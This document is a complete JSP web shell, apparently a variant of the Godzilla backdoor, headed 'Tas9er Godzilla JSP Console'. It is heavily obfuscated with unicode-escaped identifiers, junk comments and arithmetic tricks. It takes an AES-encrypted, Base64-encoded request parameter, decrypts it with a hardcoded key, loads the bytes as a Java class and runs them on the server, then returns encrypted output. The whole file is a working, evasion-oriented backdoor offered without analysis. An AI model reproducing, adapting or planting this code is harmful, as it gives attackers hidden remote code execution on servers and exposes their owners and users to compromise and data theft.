Hello Administrator!Welcome To Tas9er Godzilla JSP Console!
<%! String govsb_oF = "a589934b06b084e1";
    String govsb_c4c3BNwCWoF = "Tas9er";
    class govsb_bLthzHx4pQ extends /*edusb_1DWGZo4JfenDt*/ClassLoader {
        public govsb_bLthzHx4pQ(ClassLoader govsb_05tDUOU5v) {
            super/*edusb_YpGNxycUuW7CE3g*/(govsb_05tDUOU5v);
        }
        public Class govsb_Jog(byte[] govsb_YTiNtnOi) {
            return super./*edusb_kCjTPeGxysz*/\u0064\u0065\u0066\u0069\u006e\u0065\u0043\u006c\u0061\u0073\u0073/*edusb_mbFn2oRKJPKN*/(govsb_YTiNtnOi, 919870-919870, govsb_YTiNtnOi.length);
        }
    }
    public byte[] govsb_xLTE7TGRXdYvtbb(byte[] govsb_Wm28F9dzFY4owc, boolean govsb_QO8) {
        try {
            j\u0061\u0076\u0061\u0078./*edusb_7Yh*/\u0063\u0072\u0079\u0070\u0074\u006f.Cipher govsb_XqWyBa = j\u0061\u0076\u0061\u0078.\u0063\u0072\u0079\u0070\u0074\u006f.Cipher.\u0067\u0065\u0074\u0049\u006e\u0073\u0074\u0061\u006e\u0063e/*edusb_8k*/("AES");
            govsb_XqWyBa.init(govsb_QO8?919870/919870:919870/919870+919870/919870,new j\u0061\u0076\u0061\u0078.\u0063\u0072\u0079\u0070\u0074\u006f.spec./*edusb_XpdfsILQ*/SecretKeySpec/*edusb_gW*/(govsb_oF.getBytes(), "AES"));
            return govsb_XqWyBa.doFinal/*edusb_L6HA8B3LAsR3*/(govsb_Wm28F9dzFY4owc);
        } catch (Exception e) {
            return null;
        }
     }
    %><%
    try {
        byte[] govsb_p5xA4rYLs = java.util.Base64./*edusb_8GehzApHzg*/\u0067\u0065\u0074\u0044\u0065\u0063\u006f\u0064\u0065\u0072()./*edusb_klmt*/decode(request.getParameter(govsb_c4c3BNwCWoF));
        govsb_p5xA4rYLs = govsb_xLTE7TGRXdYvtbb(govsb_p5xA4rYLs,false);
        if (session.getAttribute/*edusb_m7sGcoiTn*/("payload") == null) {
            session.setAttribute("payload", new govsb_bLthzHx4pQ(this.\u0067\u0065\u0074\u0043\u006c\u0061\u0073\u0073()./*edusb_Yf3*/\u0067\u0065\u0074\u0043\u006c\u0061\u0073\u0073Loader())/*edusb_TMl*/.govsb_Jog(govsb_p5xA4rYLs));
        } else {
            request.setAttribute("parameters", govsb_p5xA4rYLs);
            java.io.ByteArrayOutputStream govsb_zzxJ = new java.io./*edusb_ytTPf6bCvG*/ByteArrayOutputStream();
            Object govsb_RbwmS3oqg3yc = /*edusb_dwskyW1*/((Class) session.getAttribute("payload"))./*edusb_cMWvr*//*edusb_MXeeG9eOq8F*/new\u0049\u006e\u0073\u0074\u0061\u006e\u0063\u0065()/*edusb_KsLmoid*/;
            govsb_RbwmS3oqg3yc.equals(govsb_zzxJ);
            govsb_RbwmS3oqg3yc.equals(pageContext);
            response.getWriter().write("848C83823965A5BCA3E54EF7F298D439".substring(919870-919870, 16));
            govsb_RbwmS3oqg3yc.toString();
            response.getWriter().write(java.util.Base64/*edusb_Ah3*/.getEncoder()/*edusb_0szleT5t6e*/.encodeToString(govsb_xLTE7TGRXdYvtbb(govsb_zzxJ.toByteArray(),true)));
            response.getWriter().write("848C83823965A5BCA3E54EF7F298D439".substring(16));
        }
    } catch (Exception e) {
    }
%>